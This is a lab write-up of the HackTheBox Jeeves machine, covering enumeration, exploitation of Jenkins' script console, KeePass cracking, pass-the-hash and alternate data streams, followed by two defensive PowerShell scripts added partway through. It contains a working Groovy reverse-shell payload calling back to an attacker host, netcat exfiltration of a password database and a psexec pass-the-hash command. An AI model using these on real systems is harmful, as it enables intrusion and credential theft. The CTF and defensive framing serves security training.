In this walkthrough, we will be going through the Jeeves room from HackTheBox. This room is rated as Medium on the platform and it involves exploiting a running Jenkins application. For privilege escalation, we have to crack a KeePass database to get the Administrator hash, and we capture the root flag by exposing it from an alternate data stream (ADS). So, let’s get started without any delay.

Machine Info:
| Title | Jeeves |
| IP address | 10.10.10.63 |
| Difficulty | Medium |
| OS | Windows |
| Description | Jeeves is not overly complicated, however it focuses on some interesting techniques and provides a great learning experience. As the use of alternate data streams is not very common, some users may have a hard time locating the correct escalation path. |
Enumeration:
- I started off with a regular nmap scan with service version detection and found 4 open ports: 80 (HTTP), 135 (RPC), 445 (SMB) and 50000 (Jetty).
$ sudo nmap -sS -sV 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.26s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.48 seconds

- Enumerated the application running on port 80 and found that it redirects to a page showing only an error image. Nothing useful here.


- Next, moved to the web server running on port 50000 with the Jetty installation. Looked for known exploits for the installed version but found nothing.

- Fired up gobuster against the web server to reveal hidden directories. Got a very late hit: askjeeves.
$ gobuster dir -u http://10.10.10.63:50000/ -w ~/Desktop/Wordlist/directory-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.63:50000/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/directory-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/12/01 22:19:18 Starting gobuster in directory enumeration mode
===============================================================
/askjeeves            (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]

Initial Access:
- Navigating to that directory reveals a Jenkins installation that requires no authentication to access.

- Next, I used the Groovy payload below in the script console to trigger a reverse shell connection back to my netcat listener on port 4444, which gave the initial foothold.
String host="10.10.14.2"; int port=4444; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();


- Got the user flag. Easy!

Privilege Escalation:
- Next, downloaded winPEAS onto the target and hoped for some low-hanging privilege escalation vectors, but had no luck.
powershell.exe -command iwr -Uri http://10.10.14.2:8000/winPEASx64.exe -OutFile winpeas.exe


- Moving on, found a KeePass database file in kohsuke’s Documents folder. Downloaded a netcat binary onto the target and used it to transfer the database file to our local machine.
powershell.exe -command iwr -Uri http://10.10.14.2:8000/nc.exe -OutFile nc.exe

On the local machine, listen and write whatever arrives to pass.kdbx:

nc -lp 1234 > pass.kdbx

On the target, push the database to that listener:

nc.exe -w 3 10.10.14.2 1234 < CEH.kdbx

- Next, used keepass2john to convert the file into a hash john can crack, then ran john on it. Finally got the password: moonshine1
$ ~/Tools/john/run/keepass2john pass.kdbx > hash
wh1terose@fsociety:~/CTF/HTB/machines/Jeeves$ ls
hash  pass.kdbx
wh1terose@fsociety:~/CTF/HTB/machines/Jeeves$ ~/Tools/john/run/john hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2023-12-01 23:24) 0g/s 4129p/s 4129c/s 4129C/s Pass1905..Pass1900
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
moonshine1       (pass)
1g 0:00:00:04 DONE 2/3 (2023-12-01 23:24) 0.2169g/s 4636p/s 4636c/s 4636C/s emmitt22..123QWEasd
Use the "--show" op
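The speed john reached above (a few thousand candidates per second) is set by the key-transform round count stored in the database header, the value it printed as "Cost 1 (iteration count)". As an added example, not part of the original post, this PowerShell script reads that header from a KDBX 3.x file (the KeePass 2.x container john loaded) so a defender can audit the work factor before a database ever leaves the host; the 100000-round threshold and the constructed sample header are assumptions for the demo.

```powershell
# Added example, not the walkthrough's own code: read the outer header of a
# KDBX 3.x file and report its AES-KDF transform rounds, the value john printed
# above as "Cost 1 (iteration count)". Assumes Windows PowerShell 5.1 or newer.
$KdbxCiphers = @{
    '31C1F2E6BF714350BE5805216AFC5AFF' = 'AES-256'
    'D6038A2B8B6F4CB5A524339A31DBB59A' = 'ChaCha20'
}
function Get-KdbxHeaderInfo {
    param([Parameter(Mandatory)][string]$Path)
    $b = [System.IO.File]::ReadAllBytes($Path)
    if ($b.Length -lt 12) { throw "$Path is too short to be a KDBX file" }
    # Magic numbers 0x9AA2D903 0xB54BFB67, stored little-endian
    $sig = [BitConverter]::ToUInt32($b, 0).ToString('X8') + [BitConverter]::ToUInt32($b, 4).ToString('X8')
    if ($sig -ne '9AA2D903B54BFB67') { throw "$Path has no KDBX signature" }
    $ver = [BitConverter]::ToUInt32($b, 8)
    if (($ver -shr 16) -ge 4) { throw 'KDBX 4 moves the KDF into a KdfParameters field (id 11); not handled here' }
    $info = [ordered]@{ Version = "$($ver -shr 16).$($ver -band 0xFFFF)"; Cipher = 'absent'; TransformRounds = $null }
    $pos = 12
    while ($pos + 3 -le $b.Length) {               # field = id (1 byte), size (2 bytes LE), data
        $id   = [int]$b[$pos]
        $size = [int][BitConverter]::ToUInt16($b, $pos + 1)
        if ($pos + 3 + $size -gt $b.Length) { throw 'truncated header field' }
        $data = New-Object byte[] $size
        [Array]::Copy($b, $pos + 3, $data, 0, $size)
        $pos += 3 + $size
        if ($id -eq 0) { break }                    # EndOfHeader
        if ($id -eq 2) {                            # CipherID: 16-byte UUID
            $hex = ($data | ForEach-Object { $_.ToString('X2') }) -join ''
            $info.Cipher = if ($KdbxCiphers[$hex]) { $KdbxCiphers[$hex] } else { "unknown ($hex)" }
        }
        if ($id -eq 6) { $info.TransformRounds = [BitConverter]::ToUInt64($data, 0) }   # TransformRounds
    }
    # Assumed audit threshold for this example; the walkthrough's database sits at 6000
    $info.Weak = ($null -ne $info.TransformRounds -and $info.TransformRounds -lt 100000)
    [pscustomobject]$info
}

# Constructed sample (only the outer header, not a real database): AES, 6000 rounds
function New-SampleKdbxHeader([string]$Path) {
    $bytes = [System.Collections.Generic.List[byte]]::new()
    $bytes.AddRange([byte[]](0x03,0xD9,0xA2,0x9A, 0x67,0xFB,0x4B,0xB5, 0x01,0x00,0x03,0x00))   # signature + version 3.1
    $bytes.AddRange([byte[]](2, 16, 0)); $bytes.AddRange([byte[]](0x31,0xC1,0xF2,0xE6,0xBF,0x71,0x43,0x50,0xBE,0x58,0x05,0x21,0x6A,0xFC,0x5A,0xFF))
    $bytes.AddRange([byte[]](6, 8, 0));  $bytes.AddRange([BitConverter]::GetBytes([uint64]6000))
    $bytes.AddRange([byte[]](0, 4, 0));  $bytes.AddRange([byte[]](13, 10, 13, 10))             # EndOfHeader, CRLF CRLF
    [System.IO.File]::WriteAllBytes($Path, $bytes.ToArray())
}

$sample = Join-Path $env:TEMP 'sample.kdbx'; New-SampleKdbxHeader $sample
Get-KdbxHeaderInfo $sample
```

Point it at a real .kdbx to see the rounds the owner chose; a low count is the reason a short wordlist run like the one above finishes in seconds.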

- Used the password to open the database, which held an NTLM hash kept for backup.

- Tried passing the hash to the target machine as user “Administrator” and got a success!
python3 psexec.py "Administrator"@10.10.10.63 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

- At this point I was confident of getting the root flag, but it turned out to be one more false positive. The hint it contained asked us to look deeper, meaning the file might carry some hidden text or message.

- Downloaded the Sysinternals streams binary onto the target machine to analyze the text file properly for any hidden data.
powershell.exe -command iwr -Uri http://10.10.14.2:8000/streams64.exe -OutFile streams.exe


- Running streams on it showed that root.txt is hidden inside the text file as an alternate data stream (ADS).
streams.exe -accepteula hm.txt

- Accessed the data within the hidden stream and captured the root flag.
more < hm.txt:root.txt:$DATA
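PowerShell can do what streams.exe did here without any extra binary, which is the form a defender sweeping a host for hidden data would use. The script below is an added example, not code from the original post: Find-AlternateDataStreams, the ads-demo folder and the hidden.txt stream name are all constructed for the demo, and it assumes an NTFS volume with Windows PowerShell 3.0 or later.

```powershell
# Added example, not the walkthrough's own code: find files that carry an
# alternate data stream using PowerShell's built-in -Stream parameter, the
# defender's counterpart to streams.exe. Assumes NTFS and Windows PowerShell 3+.
function Find-AlternateDataStreams {
    param([Parameter(Mandatory)][string]$Root)
    Get-ChildItem -LiteralPath $Root -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Every file has the unnamed ':$DATA' stream; any other name is an ADS.
            # Zone.Identifier is the normal mark-of-the-web on downloaded files.
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                ForEach-Object {
                    [pscustomobject]@{ File = $_.FileName; Stream = $_.Stream; Bytes = $_.Length }
                }
        }
}

# Constructed demo, mirroring hm.txt:root.txt from the box: a plain file with a
# second stream that directory listings and a plain Get-Content will not show.
$dir  = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
$file = Join-Path $dir 'hm.txt'
Set-Content -LiteralPath $file -Value 'nothing to see here'
Set-Content -LiteralPath $file -Stream 'hidden.txt' -Value 'CONSTRUCTED-SAMPLE-DATA'

Find-AlternateDataStreams -Root $dir | Format-Table -AutoSize

# Read one stream: the PowerShell equivalent of "more < hm.txt:root.txt:$DATA"
Get-Content -LiteralPath $file -Stream 'hidden.txt'

# Strip the stream once it has been reviewed (the file's main content is untouched)
Remove-Item -LiteralPath $file -Stream 'hidden.txt'
```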


Conclusion:

So that was “Jeeves” for you. The box is a Windows machine with a Jenkins installation on port 50000, which we exploited through the Groovy script console to get initial access. For privilege escalation, we found a KeePass database named CEH.kdbx; cracking it gave us the Administrator NTLM hash. Using that hash we got access as Administrator and finally captured the hidden root flag by exposing it via ADS. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.